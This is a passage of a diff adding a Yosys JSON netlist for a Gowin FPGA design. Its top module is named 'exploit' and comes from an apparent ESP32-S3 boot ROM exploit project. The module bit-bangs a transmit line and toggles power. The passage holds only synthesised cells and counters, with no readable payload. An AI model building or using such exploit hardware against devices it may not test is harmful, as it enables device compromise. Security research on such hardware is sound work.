}, + "netnames": { + "F": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:73.30-73.31" + } + }, + "I0": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:73.39-73.41" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:73.43-73.45" + } + }, + "I2": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:73.47-73.49" + } + }, + "I3": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:73.51-73.53" + } + }, + "M0": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:73.55-73.57" + } + }, + "M1": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:73.59-73.61" + } + }, + "M2": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:73.63-73.65" + } + } + } + }, + "__APICULA_LUT8": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "abc9_lut": "00000000000000000000000000010000", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:86.1-97.11" + }, + "ports": { + "F": { + "direction": "output", + "bits": [ 2 ] + }, + "I0": { + "direction": "input", + "bits": [ 3 ] + }, + "I1": { + "direction": "input", + "bits": [ 4 ] + }, + "I2": { + "direction": "input", + "bits": [ 5 ] + }, + "I3": { + "direction": "input", + "bits": [ 6 ] + }, + "M0": { + "direction": "input", + "bits": [ 7 ] + }, + "M1": { + "direction": "input", + "bits": [ 8 ] + }, + "M2": { + "direction": "input", + "bits": [ 9 ] + }, + "M3": { + "direction": "input", + "bits": [ 10 ] + } + }, + "cells": { + "$specify$52": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000100101100011", + "T_FALL_MIN": "00000000000000000000100101100011", + "T_FALL_TYP": "00000000000000000000100101100011", + "T_RISE_MAX": "00000000000000000000011000111011", + "T_RISE_MIN": "00000000000000000000011000111011", + "T_RISE_TYP": "00000000000000000000011000111011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:88.3-88.64" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 3 ] + } + }, + "$specify$53": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000100101100011", + "T_FALL_MIN": "00000000000000000000100101100011", + "T_FALL_TYP": "00000000000000000000100101100011", + "T_RISE_MAX": "00000000000000000000011000111000", + "T_RISE_MIN": "00000000000000000000011000111000", + "T_RISE_TYP": "00000000000000000000011000111000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:89.3-89.64" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 4 ] + } + }, + "$specify$54": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000100001011000", + "T_FALL_MIN": "00000000000000000000100001011000", + "T_FALL_TYP": "00000000000000000000100001011000", + "T_RISE_MAX": "00000000000000000000010101111011", + "T_RISE_MIN": "00000000000000000000010101111011", + "T_RISE_TYP": "00000000000000000000010101111011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:90.3-90.63" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 5 ] + } + }, + "$specify$55": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000011101011001", + "T_FALL_MIN": "00000000000000000000011101011001", + "T_FALL_TYP": "00000000000000000000011101011001", + "T_RISE_MAX": "00000000000000000000010011000000", + "T_RISE_MIN": "00000000000000000000010011000000", + "T_RISE_TYP": "00000000000000000000010011000000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:91.3-91.63" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 6 ] + } + }, + "$specify$56": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000010110100101", + "T_FALL_MIN": "00000000000000000000010110100101", + "T_FALL_TYP": "00000000000000000000010110100101", + "T_RISE_MAX": "00000000000000000000001101111110", + "T_RISE_MIN": "00000000000000000000001101111110", + "T_RISE_TYP": "00000000000000000000001101111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:92.3-92.62" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 7 ] + } + }, + "$specify$57": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000010011010001", + "T_FALL_MIN": "00000000000000000000010011010001", + "T_FALL_TYP": "00000000000000000000010011010001", + "T_RISE_MAX": "00000000000000000000001011101110", + "T_RISE_MIN": "00000000000000000000001011101110", + "T_RISE_TYP": "00000000000000000000001011101110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:93.3-93.50" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 8 ] + } + }, + "$specify$58": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001111010010", + "T_FALL_MIN": "00000000000000000000001111010010", + "T_FALL_TYP": "00000000000000000000001111010010", + "T_RISE_MAX": "00000000000000000000001001100110", + "T_RISE_MIN": "00000000000000000000001001100110", + "T_RISE_TYP": "00000000000000000000001001100110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:94.3-94.38" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 9 ] + } + }, + "$specify$59": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001011010011", + "T_FALL_MIN": "00000000000000000000001011010011", + "T_FALL_TYP": "00000000000000000000001011010011", + "T_RISE_MAX": "00000000000000000000000111011110", + "T_RISE_MIN": "00000000000000000000000111011110", + "T_RISE_TYP": "00000000000000000000000111011110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:95.3-95.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 10 ] + } + } + }, + "netnames": { + "F": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:86.30-86.31" + } + }, + "I0": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:86.39-86.41" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:86.43-86.45" + } + }, + "I2": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:86.47-86.49" + } + }, + "I3": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:86.51-86.53" + } + }, + "M0": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:86.55-86.57" + } + }, + "M1": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:86.59-86.61" + } + }, + "M2": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:86.63-86.65" + } + }, + "M3": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:86.67-86.69" + } + } + } + }, + "exploit": { + "attributes": { + "dynports": "00000000000000000000000000000001", + "top": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:1.1-73.10" + }, + "ports": { + "clk_in": { + "direction": "input", + "bits": [ 2 ] + }, + "bang_tx": { + "direction": "output", + "bits": [ 3 ] + }, + "power_tx": { + "direction": "output", + "bits": [ 4 ] + }, + "led": { + "direction": "output", + "bits": [ 5, 6, 7, 8, 9, 10 ] + } + }, + "cells": { + "bang_tx_OBUF_O": { + "hide_name": 0, + "type": "OBUF", + "parameters": { + }, + "attributes": { + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "I": "input", + "O": "output" + }, + "connections": { + "I": [ 11 ], + "O": [ 3 ] + } + }, + "bang_tx_reg_DFFE_Q": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 12 ], + "CLK": [ 13 ], + "D": [ 14 ], + "Q": [ 11 ] + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O": { + "hide_name": 0, + "type": "MUX2_LUT6", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:160.14-160.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 15 ], + "I1": [ 16 ], + "O": [ 14 ], + "S0": [ 17 ] + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 18 ], + "I1": [ 19 ], + "O": [ 15 ], + "S0": [ 20 ] + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0000110100000111" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input", + "I3": "input" + }, + "connections": { + "F": [ 18 ], + "I0": [ 21 ], + "I1": [ 22 ], + "I2": [ 23 ], + "I3": [ 24 ] + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0000101100000001" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input", + "I3": "input" + }, + "connections": { + "F": [ 19 ], + "I0": [ 21 ], + "I1": [ 22 ], + "I2": [ 23 ], + "I3": [ 24 ] + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 25 ], + "I1": [ 26 ], + "O": [ 16 ], + "S0": [ 20 ] + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0_LUT2_F": { + "hide_name": 0, + "type": "LUT2", + "parameters": { + "INIT": "0010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input" + }, + "connections": { + "F": [ 25 ], + "I0": [ 21 ], + "I1": [ 23 ] + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1_LUT3_F": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "00001011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input" + }, + "connections": { + "F": [ 26 ], + "I0": [ 21 ], + "I1": [ 22 ], + "I2": [ 23 ] + } + }, + "bang_tx_reg_GND_G": { + "hide_name": 0, + "type": "GND", + "parameters": { + }, + "attributes": { + }, + "port_directions": { + "G": "output" + }, + "connections": { + "G": [ 27 ] + } + }, + "clk_in_IBUF_I": { + "hide_name": 0, + "type": "IBUF", + "parameters": { + }, + "attributes": { + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "I": "input", + "O": "output" + }, + "connections": { + "I": [ 2 ], + "O": [ 13 ] + } + }, + "exploit_bytes_reg_VCC_V": { + "hide_name": 0, + "type": "VCC", + "parameters": { + }, + "attributes": { + }, + "port_directions": { + "V": "output" + }, + "connections": { + "V": [ 28 ] + } + }, + "exploit_tx_count_DFFE_Q": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 12 ], + "CLK": [ 13 ], + "D": [ 29 ], + "Q": [ 21 ] + } + }, + "exploit_tx_count_DFFE_Q_1": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 12 ], + "CLK": [ 13 ], + "D": [ 30 ], + "Q": [ 22 ] + } + }, + "exploit_tx_count_DFFE_Q_1_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 31 ], + "COUT": [ 32 ], + "I0": [ 27 ], + "I1": [ 22 ], + "I3": [ 28 ], + "SUM": [ 30 ] + } + }, + "exploit_tx_count_DFFE_Q_2": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 12 ], + "CLK": [ 13 ], + "D": [ 33 ], + "Q": [ 23 ] + } + }, + "exploit_tx_count_DFFE_Q_2_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 34 ], + "COUT": [ 31 ], + "I0": [ 27 ], + "I1": [ 23 ], + "I3": [ 28 ], + "SUM": [ 33 ] + } + }, + "exploit_tx_count_DFFE_Q_3": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 12 ], + "CLK": [ 13 ], + "D": [ 35 ], + "Q": [ 24 ] + } + }, + "exploit_tx_count_DFFE_Q_3_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 36 ], + "COUT": [ 34 ], + "I0": [ 27 ], + "I1": [ 24 ], + "I3": [ 28 ], + "SUM": [ 35 ] + } + }, + "exploit_tx_count_DFFE_Q_4": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 12 ], + "CLK": [ 13 ], + "D": [ 37 ], + "Q": [ 20 ] + } + }, + "exploit_tx_count_DFFE_Q_4_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 38 ], + "COUT": [ 36 ], + "I0": [ 27 ], + "I1": [ 20 ], + "I3": [ 28 ], + "SUM": [ 37 ] + } + }, + "exploit_tx_count_DFFE_Q_4_D_ALU_SUM_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 27 ], + "COUT": [ 38 ], + "I0": [ 28 ], + "I1": [ 17 ], + "I3": [ 28 ], + "SUM": [ 39 ] + } + }, + "exploit_tx_count_DFFE_Q_5": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 12 ], + "CLK": [ 13 ], + "D": [ 40 ], + "Q": [ 17 ] + } + }, + "exploit_tx_count_DFFE_Q_5_D_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "01" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:135.23-136.15" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 40 ], + "I0": [ 17 ] + } + }, + "exploit_tx_count_DFFE_Q_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 32 ], + "COUT": [ 41 ], + "I0": [ 27 ], + "I1": [ 21 ], + "I3": [ 28 ], + "SUM": [ 29 ] + } + }, + "instruction_counter_DFFE_Q": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 43 ], + "Q": [ 44 ] + } + }, + "instruction_counter_DFFE_Q_1": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 45 ], + "Q": [ 46 ] + } + }, + "instruction_counter_DFFE_Q_10": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 47 ], + "Q": [ 48 ] + } + }, + "instruction_counter_DFFE_Q_10_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + 